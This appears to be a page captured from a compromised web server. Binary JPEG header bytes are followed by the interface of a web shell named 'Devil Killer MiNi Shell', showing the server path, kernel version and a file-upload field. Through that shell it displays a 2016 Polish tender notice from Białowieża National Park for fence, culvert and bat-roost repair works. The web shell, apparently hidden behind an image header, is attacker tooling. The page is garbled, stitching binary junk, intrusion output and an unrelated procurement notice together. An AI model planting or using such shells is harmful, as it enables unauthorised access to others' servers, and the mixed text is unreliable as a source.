JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160915/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160915/309146-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 309146 - 2016
              z dnia 2016-09-15 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Białowieża: Remont infrastruktury służącej hodowli żubra w Ośrodku Hodowli Żubrów, remont budowli w OO Rezerwat Białowieskiego Parku Narodowego oraz adaptacja nieczynnej hydroforni na potrzeby zimowiska dla nietoperzy w Parku Pałacowym w Białowieży<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Białowieski  Park Narodowy, krajowy numer identyfikacyjny
              20066482800000, ul.
              ul. Park Pałacowy 
              11,
              17230  
              Białowieża, woj.
              podlaskie, państwo
              , tel.
              85 682 97 23, e-mail
              alicjaw@bpn.com.pl, faks
              .
              <br />
              Adres strony internetowej (URL): www.bpn.com.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Państwowa Osoba Prawna</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.pn.com.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bpn.com.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty nalezy składać w formie pisemnej<br />
                Adres:
                <br /></div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Remont infrastruktury służącej hodowli żubra w Ośrodku Hodowli Żubrów, remont budowli w OO Rezerwat Białowieskiego Parku Narodowego oraz adaptacja nieczynnej hydroforni na potrzeby zimowiska dla nietoperzy w Parku Pałacowym w Białowieży<br /><b>Numer referencyjny: </b>38/392/4/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b><br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  
                    maksymalnej liczby części 2<br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Roboty budowlane remontowe do wykonania terenie Ośrodka Hodowli Żubrów, OO Rezerwat i Parku Pałacowego zostały podzielone na części.<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>45422000-1,
                45442100-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w dniach: 40<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca spełni warunek jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę minimum 50 000,00 zł.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Doświadczenie zawodowe. Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie) wykonał w sposób należyty, zgodnie z zasadami sztuki inżynierskiej i prawidłowo ukończył:<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 5 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 6 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 7 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a)wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone; potwierdzających spełnienie warunku opisanego w pkt V.1.2c)SIWZ.
Jeżeli z uzasadnionej przyczyny Wykonawca nie może złożyć wymaganych przez zamawiającego dokumentów, o których mowa powyżej zamawiający może dopuścić złożenie przez Wykonawcę innych odpowiednich dokumentów w celu potwierdzenia spełniania warunków udziału w postępowaniu dotyczących zdolności technicznej lub zawodowej.
b) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca zobowiązany jest wnieść wadium w wysokości dla:
Część I: Remont płotów szczelnych 1260 mb - Rezerwat nr 1 i 2 
3 000,00 PLN (słownie: trzy tysiące złotych), 
Część II: Impregnacja płotów szczelnych 1260 mb - Rezerwat nr 1 i 2
1 000,00 PLN (słownie: jeden tysiąc złotych), 
Część III: Remont (przebudowa) odłowni - Rezerwat nr 3.
1 000,00 PLN (słownie: jeden tysiąc złotych),
Część IV: Wymiana pokrycia dachowego i podłóg drewnianych w trzech wiatach - OORezerwat.
1 000,00 PLN (słownie: jeden tysiąc złotych), 
Część V: Remont istniejących 5 szt. przepustów  OORezerwat.
1 000,00 PLN (słownie: jeden tysiąc złotych), 
Część VI: Remont  ogrodzeń osad służbowych - Stare Masiewo i Zamosze.
3 000,00 PLN (słownie: trzy tysiące złotych), 
Część VII: Rozbiórka i budowa punktu widokowego w kształcie brogu - OORezerwat.
1 000,00 PLN (słownie: jeden tysiąc złotych), 
Część VIII: Remont - adaptacja nieczynnej hydroforni na potrzeby zimowiska dla nietoperzy - Park Pałacowy w Białowieży.
250,00 PLN (słownie: dwieście pięćdziesiąt  złotych).
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin wykonania</td><td>20</td></tr><tr><td>okres gwarancji</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający przewiduje możliwość następującej zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:
Termin wykonania zmówienia może ulec przedłużeniu:
a)z powodu zaistnienia siły wyższej. Przez siłę wyższą rozumie się zdarzenie losowe bądź serię zdarzeń losowych, niezależne od Wykonawcy, wywołane przez czynniki zewnętrzne, których nie można było przewidzieć ani im zapobiec działając z należytą starannością, a szczególności powódź, pożar, opady deszczu, śniegu itp., które uniemożliwiają w całości lub części wykonywanie zobowiązań Wykonawcy wynikających z niniejszej Umowy,
b)z powodu wad dokumentacji projektowej wymagających poprawek lub uzupełnień, jeżeli wadliwość dokumentacji uniemożliwia lub wstrzymuje prawidłowe wykonanie umowy,
c)z powodu wystąpienia niekorzystnych warunków atmosferycznych (nie będących siłą wyższą) uniemożliwiających prawidłowe wykonanie robót, jeżeli niemożność wykonania robót w tym okresie nie jest zawiniona przez Wykonawcę,
d)jeżeli wystąpi brak możliwości wykonywania robót z powodu nie dopuszczania do ich wykonywania przez uprawniony organ lub nakazania ich wstrzymania przez uprawniony organ, z przyczyn niezależnych od Wykonawcy,
e)jeżeli zachodzi konieczność zrealizowania przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa, które nastąpiły w trakcie realizacji przedmiotu Umowy.
